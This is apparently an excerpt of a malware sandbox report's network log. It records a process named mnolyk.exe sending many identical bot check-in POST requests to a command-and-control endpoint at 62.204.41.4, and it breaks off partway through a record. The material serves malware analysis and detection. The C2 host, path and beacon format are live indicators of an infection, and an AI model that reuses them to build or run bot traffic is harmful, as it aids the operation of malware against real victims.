                            Feb 8, 2023 17:37:56.011816025 CET | 299 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:56.078195095 CET | 300 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:56 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            112 | 192.168.2.4 | 49807 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:56.250216961 CET | 300 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:56.316826105 CET | 301 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:56 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            113 | 192.168.2.4 | 49808 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:56.496601105 CET | 301 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:56.561832905 CET | 302 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:56 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            114 | 192.168.2.4 | 49809 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:56.735327959 CET | 302 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:56.799499035 CET | 303 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:56 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            115 | 192.168.2.4 | 49810 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:56.966033936 CET | 303 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:57.030962944 CET | 304 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:56 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            116 | 192.168.2.4 | 49811 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:57.197654963 CET | 304 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:57.262764931 CET | 305 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:57 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            117 | 192.168.2.4 | 49812 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:57.432480097 CET | 305 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:57.495574951 CET | 306 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:57 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            118 | 192.168.2.4 | 49813 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:57.670732021 CET | 306 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:57.735996008 CET | 307 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:57 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            119 | 192.168.2.4 | 49814 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:57.900701046 CET | 307 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:57.965436935 CET | 308 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:57 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            12 | 192.168.2.4 | 49707 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:27.346126080 CET | 201 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:27.410761118 CET | 201 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:27 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            120 | 192.168.2.4 | 49815 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:58.137634993 CET | 308 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:58.205291033 CET | 309 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:58 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            121 | 192.168.2.4 | 49816 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:58.374845982 CET | 310 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:58.437958956 CET | 310 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:58 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            122 | 192.168.2.4 | 49817 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:58.632622957 CET | 311 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:58.699338913 CET | 311 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:58 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            123 | 192.168.2.4 | 49818 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:58.886130095 CET | 311 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:58.950388908 CET | 312 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:58 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            124 | 192.168.2.4 | 49819 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:59.122996092 CET | 312 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:59.188100100 CET | 313 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:59 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            125 | 192.168.2.4 | 49820 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:59.355921030 CET | 313 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:59.422553062 CET | 314 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:59 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            126 | 192.168.2.4 | 49821 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:59.589817047 CET | 314 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:59.654450893 CET | 315 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:59 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            127 | 192.168.2.4 | 49822 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:59.825963974 CET | 315 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:59.892210007 CET | 316 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:59 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            128 | 192.168.2.4 | 49823 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:00.063009977 CET | 316 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:00.127099037 CET | 317 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:00 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            129 | 192.168.2.4 | 49824 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:00.290374994 CET | 317 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:00.354929924 CET | 318 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:00 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            13 | 192.168.2.4 | 49708 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:27.587074041 CET | 202 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
